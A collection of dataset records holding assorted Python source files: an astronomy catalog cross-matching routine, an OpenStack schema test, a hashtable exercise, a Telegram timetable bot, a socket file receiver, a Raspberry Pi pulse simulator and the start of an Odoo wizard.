is',Cat2matched[IndCatMinDist!=1])\n #print('IndCatMinDist', IndCatMinDist)\n #pdb.set_trace()\n\n #print('Cat2matched is', Cat2matched)\n # un tableau, avec le meme nombre de lignes que cat1 et le nombre de colomnes de cat2 avec:\n # -NaN si cette ligne de cat1 a pas de cross-match\n # -s'il y a un cross-matched dans cat2: la ligne de cat2 correspondant a l objet le plus proche\n # print(\"np.shape(Cat2matched)\",np.shape(Cat2matched))\n\n #print('Cat2matched is',Cat2matched)#ok avec matlab\n #print('np.shape(Cat2matched is)',np.shape(Cat2matched)) #ok avec matlab\n\n #from here it is added by me\n #create a numpy array with: columns of cat1, columns of Cat2matched\n #print('let us just make sure that Cat1 and Cat2matched have same number of lines.')ok\n #print('np.shape(Cat1) is',np.shape(Cat1))\n #print('np.shape(Cat2matched) is', np.shape(Cat2matched))\n\n\n #if save_results==True:\n # if os.path.exists(output):\n # print('the output directory, ' + output+ ' exists already')\n # else:\n # os.mkdir(output)\n # if os.path.exists(output+'/trixel_'+str(index_cat1)+'_'+Catname1):\n # print('the output directory, ' + output+'/trixel_'+str(index_cat1)+'_'+Catname1 + ' exists already')\n # else:\n # os.mkdir(output+'/trixel_'+str(index_cat1)+'_'+Catname1)\n if save_results==True:\n cross_matching_result_w_nans=np.hstack((Cat1,Cat2matched))\n #cross_matching_result_intermediate = np.empty((1,np.shape(Cat1)[1]+np.shape(cat2)[1]))\n cross_matching_result_intermediate = np.zeros((1, np.shape(Cat1)[1] + np.shape(cat2)[1]))\n for i,j in enumerate(cross_matching_result_w_nans[:,0]): #for all lines,remove the lines where no cross-matched object\n if np.all(np.isnan(cross_matching_result_w_nans[i, np.shape(Cat1)[1]:])) == False:\n if Verbose==True:\n print('At line {0} of Cat1, there is a cross-matched object in cat2'.format(i))\n #print('Cat2matched[i,:] is',Cat2matched[i,:])\n #pdb.set_trace()\n if np.shape(cross_matching_result_intermediate)[0]<2:\n #print('np.shape(cross_matching_result_intermediate)[0] is',np.shape(cross_matching_result_intermediate)[0])\n cross_matching_result_intermediate=cross_matching_result_w_nans[i,:]\n cross_matching_result_intermediate_cat1 = cross_matching_result_w_nans[i, :np.shape(Cat1)[1]]\n cross_matching_result_intermediate_cat2 = cross_matching_result_w_nans[i,np.shape(Cat1)[1]:np.shape(Cat1)[1]+np.shape(Cat2matched)[1]]\n else:\n #print('else')\n cross_matching_result_intermediate=np.vstack((cross_matching_result_intermediate,cross_matching_result_w_nans[i,:]))\n cross_matching_result_intermediate_cat1 = cross_matching_result_intermediate[:, :np.shape(Cat1)[1]]\n cross_matching_result_intermediate_cat2 = cross_matching_result_intermediate[:,np.shape(Cat1)[1]:np.shape(Cat1)[1]+np.shape(Cat2matched)[1]]\n\n #else:\n #print('there are no counterparts in cat2')\n\n all_zeros = not np.any(cross_matching_result_intermediate)\n if all_zeros==True:\n print('There are no counterpart at all in cat 2 for this tri1xel')\n #pdb.set_trace()\n else:\n #print('the shape of cross_matching_result_intermediate_cat1 is',np.shape(cross_matching_result_intermediate_cat1))\n #print('the shape of cross_matching_result_intermediate_cat2 is',\n # np.shape(cross_matching_result_intermediate_cat2))\n #print('the shape of cross_matching_result_intermediate is',\n # np.shape(cross_matching_result_intermediate))\n #print('ndim of cross_matching_result_intermediate_cat1) is 1?',\n # cross_matching_result_intermediate_cat1.ndim)\n #print('the len of cross_matching_result_intermediate_cat1 is',np.shape(cross_matching_result_intermediate_cat1)[0])\n #print('the len of cross_matching_result_intermediate_cat2 is',np.shape(cross_matching_result_intermediate_cat2)[0])\n #print('the len of cross_matching_result_intermediate is',np.shape(cross_matching_result_intermediate)[0])\n #if np.shape(cross_matching_result_intermediate_cat1)[0]!=np.shape(cross_matching_result_intermediate_cat2)[0]:\n # print('ndim of cross_matching_result_intermediate_cat1) is 1?',cross_matching_result_intermediate_cat1.ndim)\n # print('the shapes are not the same, probleme!')\n # print(cross_matching_result_intermediate_cat1)\n # print(cross_matching_result_intermediate_cat2)\n # print('np.shape(cross_matching_result_intermediate)[0] is',np.shape(cross_matching_result_intermediate)[0])\n # print('cross_matching_result_intermediate is',cross_matching_result_intermediate)\n # print('np.shape(cross_matching_result_w_nans[i,:]))',np.shape(cross_matching_result_w_nans[i,:]))\n # pdb.set_trace()\n if Verbose is True:\n print('The entries from catalog_1 ({0}) :{1}, cross-matched in catalog_2 ({2}) are {3}'.format(Catname1,cross_matching_result_intermediate_cat1,Catname2,cross_matching_result_intermediate_cat2))\n #print('cross_matching_result is',cross_matching_result)\n #print('Is the cross_matching_result the size of Ind?')#yes\n #print(np.shape(cross_matching_result))\n #print(len(Ind))\n #print('Is the number of columns of cross_matching_result the sum of the number of columns of cat1 and cat2?')#yes\n #print(np.shape(cross_matching_result))\n #print(np.shape(Cat1))\n #print(np.shape(cat2))\n \"\"\"\n if (~isempty(InPar.QueryFun))\n % execute InPar.QueryFun\n % QueryFun can select specific sources (by some\n % attributes) from the matched Cat1 and Cat2\n\n FlagSelected = InPar.QueryFun(Cat1,Cat2matched,InPar.QueryFunPar{:});\n % what to do with FlagSelected?\n Cat1 = Cat1(FlagSelected,:);\n Cat2matched = Cat2matched(FlagSelected,:);\n\n end\n\n if (~isempty(InPar.SaveFun))\n % execute InPar.SaveFun\n % Fun(Cat1,Cat2matched)\n InPar.SaveFun(Cat1,Cat2matched,InPar.SaveFunPar{:});\n end\n \"\"\"\n\n #print('np.shape(cross_matching_result_intermediate) is ',np.shape(cross_matching_result_intermediate))\n #print(\n #'np.shape(cross_matching_result_intermediate_cat1) is ', np.shape(cross_matching_result_intermediate_cat1))\n #print(\n #'np.shape(cross_matching_result_intermediate_cat2) is ', np.shape(cross_matching_result_intermediate_cat2))\n #if np.shape(cross_matching_result_intermediate_cat1)[0]!=np.shape(cross_matching_result_intermediate)[0]:\n # print('pb!')\n # print('cross_matching_result_intermediate is',cross_matching_result_intermediate)\n # print('cross_matching_result_intermediate_cat1 is',cross_matching_result_intermediate_cat1)\n # print('cross_matching_result_intermediate_cat2 is', cross_matching_result_intermediate_cat2)\n # pdb.set_trace()\n\n if save_in_one_file==True:\n if os.path.exists(output +'/cross-matching_result_full.txt')==False:\n with open(output +'/cross-matching_result_full.txt', 'ab') as f:\n if cross_matching_result_intermediate.ndim>1:\n np.savetxt(f, cross_matching_result_intermediate, delimiter=\",\",header=header1+','+header2)\n else:\n np.savetxt(f, cross_matching_result_intermediate[None], delimiter=',',header=header1+','+header2)\n else:\n with open(output +'/cross-matching_result_full.txt', 'ab') as f:\n if cross_matching_result_intermediate.ndim > 1:\n np.savetxt(f, cross_matching_result_intermediate, delimiter=\",\")\n else:\n np.savetxt(f, cross_matching_result_intermediate[None], delimiter=\",\")\n if save_in_separate_files==True:\n if os.path.exists(output +'/cross-matching_result_{0}.txt'.format(Catname1))==False:\n with open(output +'/cross-matching_result_{0}.txt'.format(Catname1), 'ab') as f:\n if cross_matching_result_intermediate_cat1.ndim>1:\n np.savetxt(f, cross_matching_result_intermediate_cat1, delimiter=\",\",header=header1)\n else:\n np.savetxt(f, cross_matching_result_intermediate_cat1[None], delimiter=\",\",\n header=header1)\n else:\n with open(output + '/cross-matching_result_{0}.txt'.format(Catname1), 'ab') as f:\n if cross_matching_result_intermediate_cat1.ndim>1:\n np.savetxt(f, cross_matching_result_intermediate_cat1,\n delimiter=\",\")\n else:\n np.savetxt(f, cross_matching_result_intermediate_cat1[None],\n delimiter=\",\")\n if os.path.exists(output + '/cross-matching_result_{0}.txt'.format(Catname2)) == False:\n with open(output + '/cross-matching_result_{0}.txt'.format(Catname2), 'ab') as f:\n if cross_matching_result_intermediate_cat2.ndim>1:\n np.savetxt(f, cross_matching_result_intermediate_cat2,\n delimiter=\",\",header=header2)\n else:\n np.savetxt(f, cross_matching_result_intermediate_cat2[None],\n delimiter=\",\", header=header2)\n else:\n with open(output + '/cross-matching_result_{0}.txt'.format(Catname2), 'ab') as f:\n if cross_matching_result_intermediate_cat2.ndim>1:\n np.savetxt(f, cross_matching_result_intermediate_cat2,\n delimiter=\",\")\n else:\n np.savetxt(f, cross_matching_result_intermediate_cat2[None],\n delimiter=\",\")\n #time checker:\n #ongoing7 = time.time()\n #print(ongoing7 - ongoing6)\n #print(ongoing6 - ongoing5)#bcp\n #print(ongoing5 - ongoing4)\n #print(ongoing4-ongoing3)\n #print(ongoing3-ongoing2)#bcp\n #print(ongoing2-ongoing1)\n #print(ongoing1-start)\n #print(ongoing7-start)\n #pdb.set_trace()\n else:\n print('None of the trixels of catalog_2 ({0}) overlapping with trixel #{1} of catalog_1 ({2}) has sources in it'.format(Catname2,index_cat1,Catname1))\n #pdb.set_trace()\n else:\n print('trixel #{0} of Catalog_1 ({1}) is empty'.format(index_cat1,Catname1))\n if time_it==True:\n ongoing7 = time.time()\n print('it took {0} seconds for the process to run'.format(ongoing7 - start))\n\n\ndef read_ztf_HDF_matched(FieldID,Lines,ColCell=None,path=None):\n \"\"\"\n Description: Read ZTF matched light curves from local HDF5 light curve files. The HDF5 files are distributed as part of the catsHTM catalogs.\n Input : - ZTF field number.\n - [start end] lines to read. The lines for a given source are\n available in I1 and I2 in the 'ztfSrcLCDR1' catsHTM catalog.\n * Arbitrary number of pairs of arguments: ...,keyword,value,...\n where keyword are one of the followings:\n 'FileTemp' - File template name. Default is\n 'ztfLCDR1_%06d.hdf5'.\n 'ColCell' - Column names for catalog.\n Default is\n {'HMJD','Mag','MagErr','ColorCoef','Flags'}.\n Output : - Catalog\n - ColCell\n By : Maayane Soumagnac. Trnslated from Eran O. Ofek's matlab routine with the same name\n URL : http://weizmann.ac.il/home/eofek/matlab/\n Example: Cat=VO.ZTF.read_ztf_HDF_matched(686,[1 100])\n Cat=VO.ZTF.read_ztf_HDF_matched(703,[38104798 38104901])\n \"\"\"\n #FileTemp = 'ztfLCDR1_%06d.hdf5';\n if ColCell is None:\n ColCell = np.array(['HMJD','Mag','MagErr','ColorCoef','Flags'])\n #InPar = InArg.populate_keyval(DefV,varargin,mfilename);\n if path is None:\n path='./'\n\n FieldIDstring=\"{number:06}\".format(number=FieldID)#'ztfLCDR1_%06d.hdf5'\n FileName = 'ztfLCDR1_'+FieldIDstring+'.hdf5'\n #dataset='ztfLCDR1_'+FieldIDstring\n #print(FileName)\n #print(path+'/'+FileName)\n\n Ncol = len(ColCell)\n\n #print(class_HDF5.HDF5(path+'/'+FileName).info())\n #print([Lines[0],0])\n #print([Lines[1],1])\n Cati = class_HDF5.HDF5(path+'/'+FileName).load(dataset_name='/AllLC',numpy_array=True)#,Offset=[Lines[0],Lines[1]-Lines[0]+1])#,Block=[Lines[1]-Lines[0], Ncol-1])\n Cat=Cati.T\n #print(np.shape(Cat))\n Cat_cut=Cat[Lines[0]-1:Lines[1],:]\n #print(Cat_cut)\n return Cat_cut,ColCell\n #if (nargout>2):\n # CatProp = HDF5.load(FileName,'/IndAllLC');\n #end\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"build/lib/catsHTM/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":72031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"73784495","text":"# Copyright 2012 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_serialization import jsonutils\nimport requests\n\nfrom subject.tests import functional\n\n\nclass TestSchemas(functional.FunctionalTest):\n\n def setUp(self):\n super(TestSchemas, self).setUp()\n self.cleanup()\n self.start_servers(**self.__dict__.copy())\n\n def test_resource(self):\n # Ensure the subject link works and custom properties are loaded\n path = 'http://%s:%d/v1/schemas/subject' % ('127.0.0.1', self.api_port)\n response = requests.get(path)\n self.assertEqual(200, response.status_code)\n subject_schema = jsonutils.loads(response.text)\n expected = set([\n 'id',\n 'name',\n 'visibility',\n 'checksum',\n 'created_at',\n 'updated_at',\n 'tags',\n 'size',\n 'virtual_size',\n 'owner',\n 'container_format',\n 'disk_format',\n 'self',\n 'file',\n 'status',\n 'schema',\n 'direct_url',\n 'locations',\n 'min_ram',\n 'min_disk',\n 'protected',\n ])\n self.assertEqual(expected, set(subject_schema['properties'].keys()))\n\n # Ensure the subjects link works and agrees with the subject schema\n path = 'http://%s:%d/v1/schemas/subjects' % ('127.0.0.1', self.api_port)\n response = requests.get(path)\n self.assertEqual(200, response.status_code)\n subjects_schema = jsonutils.loads(response.text)\n item_schema = subjects_schema['properties']['subjects']['items']\n self.assertEqual(item_schema, subject_schema)\n\n self.stop_servers()\n","sub_path":"subject/tests/functional/v2/test_schemas.py","file_name":"test_schemas.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"247957289","text":"from hashtables import (HashTable,\n hash_table_insert,\n hash_table_retrieve)\n\n\nclass Ticket:\n def __init__(self, source, destination):\n self.source = source\n self.destination = destination\n\n\ndef reconstruct_trip(tickets, length):\n hashtable = HashTable(length)\n route = [None] * length\n\n # Starting trip, will have the source of NONE\n # The final destination, will have the destination of NONE\n # Doing this, will have our first and last routes for the trip\n # In between the first and last routes, we will want to link source\n # and destinations together to create the proper list.\n # Looping over the list, to match source & destination\n # key/value pair\n # Things we have are tickets, length of list, source, and destination\n # With what we have within the hashtables file, we need to be able to\n # insert items within the list and we need to be able to retrieve items\n # within the list. From information given, it does not appear that\n # we would need to remove items from the list or resize the list\n # Insert is looking for hash_table, key, and value\n # Retrieve is looking hash_table and key\n\n # Want to be able to access key/value of source/destination\n for i in tickets:\n hash_table_insert(hashtable, i.source, i.destination)\n # Retrieve would be looking for hash_table_retrieve(hashtable, key)\n # If we are looking for the key of none, would place destination at route[i]\n # If key is not none, destination would be route[i - 1]?\n for i in range(length):\n # route[i] is None cannot be iterated over\n if route[i] is not None:\n # Current issue with this if statement as with printing,\n # it jumps right over to the else\n # Commented out print statement, not being printed\n # print(\"Route not None: \", route)\n hash_table_retrieve(hashtable, route[i - 1])\n else:\n # Code is jumping straight to the else statement\n # print(\"Route: \", route)\n hash_table_retrieve(hashtable, 'NONE')\n # Returning list of none equal to the amount of items supposed to be within the list\n # None is not being evaluated properly\n return route[1:]\n","sub_path":"hashtables/ex2/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"348466838","text":"import telebot\nimport config\nimport sqlite3\nimport sys\nimport time\nimport random\nimport function\nimport db_function\nfrom telebot import types\n\nbot = telebot.TeleBot(config.token)\n\n\n@bot.message_handler(commands = [\"start\",\"group\"])\ndef question_group(message):\n\n\tgr = '0'\n\tbot.send_message(message.chat.id, 'В какой группе ты учишься?')\n\tdb_function.write_condition(message.chat.id, config.STATE.status_1, gr,message)\n\n@bot.message_handler(func=lambda message: db_function.give_condition(message.chat.id,message) == config.STATE.status_1)\ndef record_group(message):\n\n\tif db_function.check_group(message) == 1:\n\n\t\tfix = message.text.replace('-','')\n\t\tfix = fix.replace('А','A')\n\t\tgr =\"'\"+fix+\"'\"\n\t\tdb_function.write_condition(message.chat.id, config.STATE.status_2, gr, message)\n\t\tbot.send_message(message.chat.id, 'Теперь просто напиши мне, и я предложу тебе твое расписание')\n\t\tkeyboard = types.ReplyKeyboardMarkup(resize_keyboard = True)\n\t\tkeyboard.add(*[types.KeyboardButton(name) for name in ['Понедельник', 'Вторник', 'Среда','Четверг','Пятница','Суббота','На всю неделю']])\n\t\tmessage_answer = bot.send_message(message.chat.id,'Какой день недели тебя интересует?',reply_markup=keyboard)\n\n\telse:\n\n\t\tgr = '0'\n\t\tdb_function.write_condition(message.chat.id, config.STATE.status_1, gr, message)\n\t\tquestion_group(message)\n\n@bot.message_handler(func=lambda message: db_function.give_condition(message.chat.id,message) == config.STATE.status_2)\ndef give_data(message):\n\n\tconn = sqlite3.connect(config.database)\n\tday = message.text.capitalize()\n\n\tif day == 'Понедельник':\n\t\tfunction.Monday(message)\n\n\telif day == 'Вторник':\n\t\tfunction.Tuesday(message)\n\n\telif day == 'Среда':\n\t\tfunction.Wednesday(message)\n\n\telif day == 'Четверг':\n\t\tfunction.Thursday(message)\n\n\telif day == 'Пятница':\n\t\tfunction.Friday(message)\n\n\telif day == 'Суббота':\n\t\tfunction.Saturday(message)\n\n\telif message.text == 'На всю неделю':\n\n\t\ttry:\n\t\t\tbot.send_message(message.chat.id, 'ПОНЕДЕЛЬНИК:')\n\t\t\tfunction.Monday(message)\n\t\t\tbot.send_message(message.chat.id, 'ВТОРНИК:')\n\t\t\tfunction.Tuesday(message)\n\t\t\tbot.send_message(message.chat.id, 'СРЕДА:')\n\t\t\tfunction.Wednesday(message)\n\t\t\tbot.send_message(message.chat.id, 'ЧЕТВЕРГ:')\n\t\t\tfunction.Thursday(message)\n\t\t\tbot.send_message(message.chat.id, 'ПЯТНИЦА:')\n\t\t\tfunction.Friday(message)\n\t\t\tbot.send_message(message.chat.id, 'СУББОТА:')\n\t\t\tfunction.Saturday(message)\n\t\texcept sqlite3.DatabaseError as err: \n\t\t\tprint(\"Error: \", err)\n\n\n\n\nif __name__ == '__main__':\n\tbot.polling(none_stop=True)\n\n","sub_path":"Bot_MPEI.py","file_name":"Bot_MPEI.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"230578823","text":"#!/usr/bin/env python3\n# server\nimport socket\n\nHOST = '' # Symbolic name meaning all available interfaces\nPORT = 50007 # Arbitrary non-privileged port\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((HOST, PORT))\n\ncount = 0\nwhile (1):\n s.listen(1)\n # print type(s.accept())\n conn, addr = s.accept()\n print('Connected by', addr)\n\n tst = open('text' + str(count) + '.txt', 'w') # create new file\n count = count + 1\n while 1:\n data = conn.recv(1024)\n if data:\n tst.write(data.decode()) # write to file\n else:\n conn.close()\n tst.close()\n break","sub_path":"server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"614762317","text":"class Node:\n def __init__(self, data):\n self.right = None\n self.left = None\n self.data = data\nclass Solution:\n def insert(self,root,data):\n if root == None:\n return Node(data)\n else:\n if data <= root.data:\n cur = self.insert(root.left, data)\n root.left = cur\n else:\n cur = self.insert(root.right, data)\n root.right = cur\n return root\n\n def getHeight(self, root):\n #Write your code here\n if not root:\n return -1\n\n if not root.left and not root.right:\n return 0\n\n height_left = self.getHeight(root.left)\n height_right = self.getHeight(root.right)\n\n return max(height_left, height_right) + 1\n\n\nT=7\nmyTree = Solution()\nroot = None\nfor i in range(T):\n data = [3, 5, 2, 1, 4, 6, 7]\n root = myTree.insert(root, data[i])\nheight = myTree.getHeight(root)\nprint(height)","sub_path":"src/22_binarySearchTree.py","file_name":"22_binarySearchTree.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"459271674","text":"# -*- coding: utf-8 -*-\n# パルスシミュレーターの完成形プログラム\n\n\nimport pandas as pd\nimport csv\nfrom time import sleep # time モジュールから sleep メソッドを取得\nimport RPi.GPIO as GPIO\nimport platform\nGPIO.setmode(GPIO.BCM)\n\n# pandas でcsvデータの二次元表を取得\ncsv_dataframe = pd.read_csv(\n '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simdata.csv', sep=',', encoding='utf-8', index_col=False, header=None)\n\npf = platform.system()\n\nLinux_path = '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simdata.csv'\nMac_path = '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simdata.csv'\n\nif pf == 'Linux':\n pulse_csv = open(Linux_path)\nelif pf == 'Darwin':\n pulse_csv = open(Mac_path)\n\n\n###########################################################################################\n# インデント減らしたい時、Shift + Tab\n\nPLpoat = [17, 27, 22]\n\nfor i in PLpoat:\n GPIO.setup(i, GPIO.OUT)\n\n\nPL1_sc1 = []\nPL1_bc1 = []\nPL2_sc2 = []\nPL2_bc2 = []\nPL3_sc3 = []\nPL3_bc3 = []\n\nPL_sc = [PL1_sc1, PL2_sc2, PL3_sc3]\nPL_bc = [PL1_bc1, PL2_bc2, PL3_bc3]\n\n\nindex_PLsc = 0\nindex_PLbc = 0\n\nfor n in range(11):\n if n % 4 == 0:\n PL_sc[index_PLsc] = list(csv_dataframe[n])\n del PL_sc[index_PLsc][0:3]\n # replace で文字列内の余分な空白を削除\n PL_sc[index_PLsc] = [t.replace(\" \", \"\") for t in PL_sc[index_PLsc]]\n PL_sc[index_PLsc] = [a for a in PL_sc[index_PLsc]\n if a != ''] # リスト内の空白要素を削除\n PL_sc[index_PLsc] = [int(s)\n for s in PL_sc[index_PLsc]] # リスト要素 str を intに変換\n index_PLsc += 1\n\n elif n % 4 == 1:\n PL_bc[index_PLbc] = list(csv_dataframe[n])\n del PL_bc[index_PLbc][0:3]\n PL_bc[index_PLbc] = [t.replace(\" \", \"\") for t in PL_bc[index_PLbc]]\n PL_bc[index_PLbc] = [a for a in PL_bc[index_PLbc] if a != '']\n PL_bc[index_PLbc] = [int(s) for s in PL_bc[index_PLbc]]\n index_PLbc += 1\n else:\n pass\n\n\n# print(PL_sc)\n# print(PL_bc)\n\n########################################################################\n# インデント減らしたい時、Shift + Tab\n\nADpoat = [10, 9, 11]\n\nfor i in ADpoat:\n GPIO.setup(i, GPIO.OUT)\n\nAD1_sc1 = []\nAD1_bc1 = []\nAD2_sc2 = []\nAD2_bc2 = []\nAD3_sc3 = []\nAD3_bc3 = []\n\nAD_sc = [AD1_sc1, AD2_sc2, AD3_sc3]\nAD_bc = [AD1_bc1, AD2_bc2, AD3_bc3]\n\nindex_ADsc = 0\nindex_ADbc = 0\n\nfor n in range(13, 24):\n if n % 4 == 0:\n AD_sc[index_ADsc] = list(csv_dataframe[n])\n del AD_sc[index_ADsc][0:3]\n # reADace で文字列内の余分な空白を削除\n AD_sc[index_ADsc] = [t.replace(\" \", \"\") for t in AD_sc[index_ADsc]]\n AD_sc[index_ADsc] = [a for a in AD_sc[index_ADsc]\n if a != ''] # リスト内の空白要素を削除\n AD_sc[index_ADsc] = [int(s)\n for s in AD_sc[index_ADsc]] # リスト要素 str を intに変換\n index_ADsc += 1\n\n elif n % 4 == 1:\n AD_bc[index_ADbc] = list(csv_dataframe[n])\n del AD_bc[index_ADbc][0:3]\n AD_bc[index_ADbc] = [t.replace(\" \", \"\") for t in AD_bc[index_ADbc]]\n AD_bc[index_ADbc] = [a for a in AD_bc[index_ADbc] if a != '']\n AD_bc[index_ADbc] = [int(s) for s in AD_bc[index_ADbc]]\n index_ADbc += 1\n else:\n pass\n\n# print(AD_sc)\n# print(AD_bc)\n\n###########################################################################\n# DDS40bit データのシミュレーション\n\n# pandas でcsvデータの二次元表を取得\ncsv_DDSdataframe = pd.read_csv(\n '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simDDSdata.csv', sep=',', encoding='utf-8', index_col=False, header=None)\n\n\nif pf == 'Linux':\n dds_csv = open(\n '/home/ubuntu/Documents/Python/Pine64-python--pulse/Pulsesimulator/usual/pulse_simDDSdata.csv')\nelif pf == 'Darwin':\n dds_csv = open(\n '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simDDSdata.csv')\n\nDDSpoat = [26, 19]\n\n\nfor i in range(len(DDSpoat)):\n GPIO.setup(DDSpoat[i], GPIO.OUT)\n\n\nDDS1_sc = []\nDDS1_data = []\nDDS2_sc = []\nDDS2_data = []\n\nDDS_sc = [DDS1_sc, DDS2_sc]\nDDS_data = [DDS1_data, DDS2_data]\n\nindex_DDSsc = 0\nindex_DDSdata = 0\n\nhinann = []\n\nfor n in range(14):\n if n % 8 == 0: # DDSscについての記述\n DDS_sc[index_DDSsc] = list(csv_DDSdataframe[n])\n del DDS_sc[index_DDSsc][0:3]\n DDS_sc[index_DDSsc] = [t.replace(\" \", \"\") for t in DDS_sc[index_DDSsc]]\n DDS_sc[index_DDSsc] = [a for a in DDS_sc[index_DDSsc]\n if a != '']\n DDS_sc[index_DDSsc] = [int(s)\n for s in DDS_sc[index_DDSsc]] # リスト要素 str を intに変換\n index_DDSsc += 1\n\n elif n % 8 == 4:\n DDS_data[index_DDSdata] = list(csv_DDSdataframe[n])\n del DDS_data[index_DDSdata][0:3]\n\n for i in range(len(DDS_data[index_DDSdata])):\n chars = DDS_data[index_DDSdata][i]\n\n DDS_data[index_DDSdata][i] = list(chars)\n hinann.append(DDS_data[index_DDSdata][i])\n DDS_data[index_DDSdata][i] = [a for a in hinann[-1]\n if a != ' ']\n DDS_data[index_DDSdata][i] = [int(s)\n for s in DDS_data[index_DDSdata][i]]\n index_DDSdata += 1\n\n else:\n pass\n\n# print(DDS_sc)\n# print(DDS_data)\n\n########################################################################################\n\n\ncounter = 0\nindex = [0 for i in range(8)]\nx = 0 # sc1_intのインデックス\nk = 0 # DDSsc1_intのインデックス\n\nwhile True:\n while counter <= max(max(PL_sc, AD_sc, DDS_sc, key=max)):\n if counter <= PL1_sc1[-1]:\n if PL1_sc1[index[0]] == counter:\n GPIO.output(PLpoat[0], 1)\n sleep(PL1_bc1[index[0]] * 0.001)\n index[0] += 1\n print('%d' % counter) # end=':PL1出力中')\n\n if counter <= PL2_sc2[-1]:\n if PL2_sc2[index[1]] == counter:\n GPIO.output(PLpoat[1], 1)\n sleep(PL2_bc2[index[1]] * 0.001)\n index[1] += 1\n print('%d' % counter) # end=':PL2出力中')\n\n if counter <= PL3_sc3[-1]:\n if PL3_sc3[index[2]] == counter:\n GPIO.output(PLpoat[2], 1)\n sleep(PL3_bc3[index[2]] * 0.001)\n index[2] += 1\n print('%d' % counter) # end=':PL3出力中')\n\n\n#############################################################\n\n if counter <= AD1_sc1[-1]:\n if AD1_sc1[index[3]] == counter:\n GPIO.output(ADpoat[0], 1)\n sleep(AD1_bc1[index[3]] * 0.001)\n index[3] += 1\n print('%d' % counter) # end=':AD1出力中')\n\n if counter <= AD2_sc2[-1]:\n if AD2_sc2[index[4]] == counter:\n GPIO.output(ADpoat[1], 1)\n sleep(AD2_bc2[index[4]] * 0.001)\n index[4] += 1\n print('%d' % counter) # end=':AD2出力中')\n\n if counter <= AD3_sc3[-1]:\n if AD3_sc3[index[5]] == counter:\n GPIO.output(ADpoat[2], 1)\n sleep(AD3_bc3[index[5]] * 0.001)\n index[5] += 1\n print('%d' % counter) # end=':AD3出力中')\n\n\n##############################################################\n\n if DDS1_sc[k] == counter:\n for m in range(len(DDS1_data[k])):\n GPIO.output(DDSpoat[0], DDS1_data[k][m])\n sleep(0.5)\n print('%d' % counter) # end=':DDS1出力中')\n k += 1\n\n if DDS2_sc[x] == counter:\n for m in range(len(DDS2_data[x])):\n GPIO.output(DDSpoat[1], DDS2_data[x][m])\n sleep(0.5)\n print('%d' % counter) # end=':DDS2出力中')\n x += 1\n\n else:\n GPIO.output(PLpoat[0], 0)\n GPIO.output(PLpoat[1], 0)\n GPIO.output(PLpoat[2], 0)\n\n GPIO.output(ADpoat[0], 0)\n GPIO.output(ADpoat[1], 0)\n GPIO.output(ADpoat[2], 0)\n\n GPIO.output(DDSpoat[0], 0)\n GPIO.output(DDSpoat[1], 0)\n\n sleep(0.5)\n print('%d' % counter) # end=':LOWlevel')\n\n counter += 1\n # print(counter)\n else:\n counter = 0\n index = [0 for i in range(8)]\n k = 0\n x = 0\n\n\nGPIO.cleanup()\n","sub_path":"Pulsesimulator/main_simulator/pulsesim.py","file_name":"pulsesim.py","file_ext":"py","file_size_in_byte":8661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"645764403","text":"from mixpanel import Mixpanel\nfrom bluebottle.clients import properties\n\n\ndef bb_track(title=\"\", data={}):\n \"\"\"\n Wrapper function for backend mixpanel tracking.\n One day we may be able to refactor this to the adapter pattern for\n multiple metrics.\n \"\"\"\n if not title:\n return False\n\n mp = None\n key = getattr(properties, 'MIXPANEL', None)\n\n if key:\n mp = Mixpanel(key)\n else:\n return False\n\n if mp:\n mp.track(None, title, data)\n","sub_path":"bluebottle/bb_metrics/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91896215","text":"\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\nclass ProductBarcodeWizard(models.TransientModel):\n _name ='product.barcode.wizard'\n _description ='product.barcode.wizard'\n \n def _prod_calc(self):\n product=self.env['product.product'].browse(self._context.get('active_ids'))\n # barcode=self.env['product.barcode.line.wizard'].create([{'product_id'}])\n barcode = []\n for line in product:\n # valores=\"\"\n # if line.attribute_value_ids:\n # x=0\n # for a in line.attribute_value_ids:\n # if x==0:\n # valores=a.name\n # else:\n # valores = valores+', '+a.name\n # x+=1\n # producto_name=str(line.name)+' '+'('+ str(valores)+')'\n # line.name = producto_name\n barcode.append(self.env['product.barcode.line.wizard'].create({'product_id':line.id}).id)\n return barcode\n \n pricelist_id = fields.Many2one(comodel_name='product.pricelist', string='Tarifa')\n location_id = 